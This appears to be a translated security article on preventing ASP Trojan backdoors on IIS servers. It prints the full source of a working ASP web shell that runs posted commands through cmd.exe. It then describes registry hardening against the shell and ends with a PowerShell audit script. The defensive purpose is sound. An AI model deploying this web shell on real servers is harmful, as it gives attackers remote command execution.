As ASP technology has spread, more and more web sites are built on it, and ASP support can be regarded as a basic function of the IIS server on Windows. But Trojan backdoors written in ASP are also becoming more common and more powerful. Because ASP is a service provided by the server itself, such an ASP script backdoor is not detected by anti-virus software; hackers call it the "backdoor that can never be killed". Its concealment and the difficulty of removing it pose a serious threat to site security, so the prevention and removal of ASP Trojans places higher technical demands on network administrators. Below, drawing on personal experience, I discuss prevention methods for two fairly typical ASP Trojans and hope it is of some help to everyone.
The following is the code for the first Trojan:
<title>ASP Shell</title>
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

' -- Create the COM objects that we'll be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' -- Check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    ' -- Use a poor man's pipe ... a temp file --
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Execute command">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file --
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</BODY>
</HTML>
Type the dir command into the text box and click Execute to list the directory. It can run a variety of DOS commands, such as copy, net, netstat and so on.
However, by default it executes only with guest rights, that is, the permissions of the IUSR_computername account. Of course, if the IUSR_computername user is added to the Administrators group, it then has administrator privileges. The feature of this Trojan is that it is very convenient to use, almost like working in a DOS command-line window. However, if the server restricts the FSO (no component uploads), it cannot be used at all. Nor can it be used on virtual hosts added to the server afterward; it works only in the default Web site, so its scope is relatively narrow.
For the prevention method, let's look at its code:
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
' Creates a WSCRIPT.SHELL object named oScript, used to execute commands
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
The above three lines create three objects: Wscript.Shell, Wscript.Network and Scripting.FileSystemObject. We can control the Wscript.Shell object simply by renaming or deleting its entries in the registry (see the figure below). Note that both the "WSCRIPT.SHELL" key and the "WSCRIPT.SHELL.1" key must be renamed or deleted. If we modify only the "WSCRIPT.SHELL" key, the hacker just changes the code as follows:
Set oScript = Server.CreateObject("WSCRIPT.SHELL.1")
and this backdoor Trojan works again.
As you may have guessed, when renaming the "WSCRIPT.SHELL" and "WSCRIPT.SHELL.1" keys, the new names must not be easy for hackers to guess. For example, if you rename "WSCRIPT.SHELL" to "WSCRIPT.SHELL888", the hacker just changes the code accordingly:
Set oScript = Server.CreateObject("WSCRIPT.SHELL888")
and the Trojan program can be executed again. Also note that after changing the registry, the Web service must be restarted for the settings to take effect.
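One way to verify that the registry change above really took effect for both keys, as an added example in PowerShell (not code from the original article): it assumes it runs in an elevated session on the IIS host, and the ProgID list is taken from the Trojan's Server.CreateObject calls plus the ".1" keys the text says must be handled together.

```powershell
# Added example, not from the original article: audit the COM ProgIDs the backdoor
# above creates, so you can confirm the registry hardening took effect. Run it in
# an elevated PowerShell on the IIS host; it only reports and changes nothing.
# Assumption: the name list comes from the Trojan's Server.CreateObject calls plus
# the versioned ".1" keys the article says must be renamed or deleted together.
$progIds = @(
    'WScript.Shell', 'WScript.Shell.1',        # handle both, or the shell still loads
    'WScript.Network', 'WScript.Network.1',
    'Scripting.FileSystemObject'
)

function Test-ProgId {
    param([string]$ProgId)

    $key = "Registry::HKEY_CLASSES_ROOT\$ProgId"
    $row = [ordered]@{ ProgId = $ProgId; KeyPresent = $false; Clsid = $null; Creatable = $false }

    if (Test-Path -LiteralPath $key) {
        $row.KeyPresent = $true
        # The ProgID key's CLSID subkey (default value) is the class the name maps to
        $row.Clsid = (Get-ItemProperty -LiteralPath "$key\CLSID" -ErrorAction SilentlyContinue).'(default)'
    }

    try {
        # Same lookup Server.CreateObject performs: does the ProgID still yield an object?
        $null = New-Object -ComObject $ProgId -ErrorAction Stop
        $row.Creatable = $true
    } catch {
        # The ProgID no longer resolves; this is the state you want after hardening
    }

    [pscustomobject]$row
}

$progIds | ForEach-Object { Test-ProgId $_ } | Format-Table -AutoSize
```

After renaming both keys, the WScript.Shell and WScript.Shell.1 rows should show KeyPresent False and Creatable False; a row that is still Creatable means the Trojan can still instantiate the object under that name. The check runs under your own account, so it confirms the registry state but not the permissions of the IUSR account the ASP page runs as.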